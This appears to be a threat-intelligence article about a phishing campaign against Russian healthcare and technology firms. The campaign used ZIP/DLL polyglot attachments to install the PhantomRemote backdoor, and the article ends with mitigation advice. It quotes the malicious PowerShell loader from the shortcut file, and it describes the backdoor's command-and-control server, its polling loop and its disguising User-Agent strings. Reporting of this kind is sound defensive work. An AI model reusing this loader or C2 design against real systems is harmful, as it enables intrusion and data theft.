In late June 2025, cybersecurity teams in Russia’s healthcare and technology sectors encountered a surge of seemingly routine emails concerning logistics and contracts. These emails, appearing legitimate with familiar subject lines and trusted sender addresses, contained attachments that masqueraded as standard ZIP files but functioned as executable libraries. This deceptive technique, utilizing polyglot files—files valid in multiple formats—enabled attackers to bypass secure email gateways and directly install malware on employee workstations.
Understanding Polyglot Files
Polyglot files are crafted to be interpretable as multiple file types, depending on the application processing them. This duality allows cybercriminals to embed malicious code within files that appear benign, effectively circumventing security measures that rely on file type identification. For instance, a file may simultaneously function as a ZIP archive and a DLL (Dynamic Link Library), exploiting the way different systems handle these formats.
The Attack Mechanism
Analysts at Bi.Zone linked this attack wave to the Rainbow Hyena threat group. Each malicious attachment was a polyglot file, serving as both a PE32+ DLL and a ZIP archive. Email filters, focusing solely on the ZIP header, overlooked the embedded DLL, allowing the malicious payload to reach recipients unchecked. The attackers further enhanced the credibility of their emails by using compromised corporate mailboxes instead of spoofed domains, increasing the likelihood of recipients trusting and opening the attachments.
Upon opening the attachment, Windows treated it as a compressed folder containing a single shortcut. This shortcut, disguised with an icon resembling a contract update, executed a PowerShell script when clicked. The script searched for the polyglot file on the disk and launched it using rundll32.exe. Simultaneously, a legitimate-looking spreadsheet was extracted and opened to divert the user’s attention from the malicious activity.
Rapid Compromise and Stealthy Persistence
Telemetry data indicated that multiple organizations progressed from the initial click to full backdoor installation in under five minutes. The deployed malware, named PhantomRemote, provided the attackers with capabilities such as command execution, file download, and system inventory collection over plain HTTP. To blend into normal network traffic, PhantomRemote adopted User-Agent strings like YandexCloud/1.0 or MicrosoftAppStore/2001.0. Even after perimeter detection, the malware’s persistence mechanisms allowed the threat actors to maintain access until manual remediation was performed.
Technical Details of the Infection Process
The shortcut file contained the entire infection logic. An excerpt from the malicious LNK file revealed that the script searched for its payload and executed it as follows:
“`powershell
$r=$(Get-Location).Path+’\\Договор_РН83_37_изменения.zip’;
if(Test-Path $r){rundll32.exe $r,EntryPoint}else{
$f=Get-ChildItem -Path ‘%userprofile%’ -Recurse -Filter ‘Договор_РН83_37_изменения.zip’ | Select-Object -First 1;
if($f){rundll32.exe $f.FullName,EntryPoint}
}
“`
When rundll32.exe triggered PhantomRemote’s exported EntryPoint, the malware collected the computer and domain names, generated a GUID, and created a workspace at %PROGRAMDATA%\YandexCloud. It then communicated with the command and control (C2) server at 91.239.148[.]21/poll, sending the harvested identifiers. Subsequent C2 responses, such as `cmd:ipconfig|42`, were executed through cmd.exe, with the output returned via HTTP POST. This loop repeated every 10 seconds, with a fallback to a 1-second retry on failure, ensuring both resilience and stealth in the compromise.
Broader Implications and Similar Techniques
The use of polyglot files in cyberattacks is not an isolated incident. A study titled On the Abuse and Detection of Polyglot Files highlighted that existing file-format and embedded-file detection tools often fail to reliably detect polyglot files used in the wild, leaving organizations vulnerable to attack. The study found 30 polyglot samples and 15 attack chains leveraging polyglot files, underscoring the sophistication of such techniques.
In another instance, a threat actor used polyglot files to conceal the installation of a new backdoor as part of a spear-phishing campaign targeting firms in the United Arab Emirates, particularly in the aviation, satellite communications, and transportation sectors. The backdoor, dubbed Sosano, was discovered by researchers at Proofpoint with assistance from PwC’s Threat Intelligence team. The attackers first compromised the email account of an Indian electronics company, then used that access to send email messages with malicious links leading to ZIP files containing polyglot files to obfuscate payload content.
Recommendations for Mitigation
To defend against such sophisticated attacks, organizations should consider the following measures:
1. Advanced Email Filtering: Implement email security solutions capable of analyzing the content and structure of attachments beyond standard file type checks.
2. User Education: Train employees to recognize suspicious emails and avoid opening unexpected attachments, even from seemingly legitimate sources.
3. Endpoint Detection and Response (EDR): Deploy EDR solutions to monitor and respond to suspicious activities on endpoints, providing an additional layer of security.
4. Regular Software Updates: Ensure that all systems and software are up to date with the latest security patches to mitigate vulnerabilities that could be exploited by such attacks.
5. Network Traffic Analysis: Monitor network traffic for unusual patterns or communications with known malicious IP addresses, which can indicate a compromise.
By adopting a multi-layered security approach and staying informed about emerging threats like polyglot file attacks, organizations can enhance their resilience against sophisticated cyber threats.
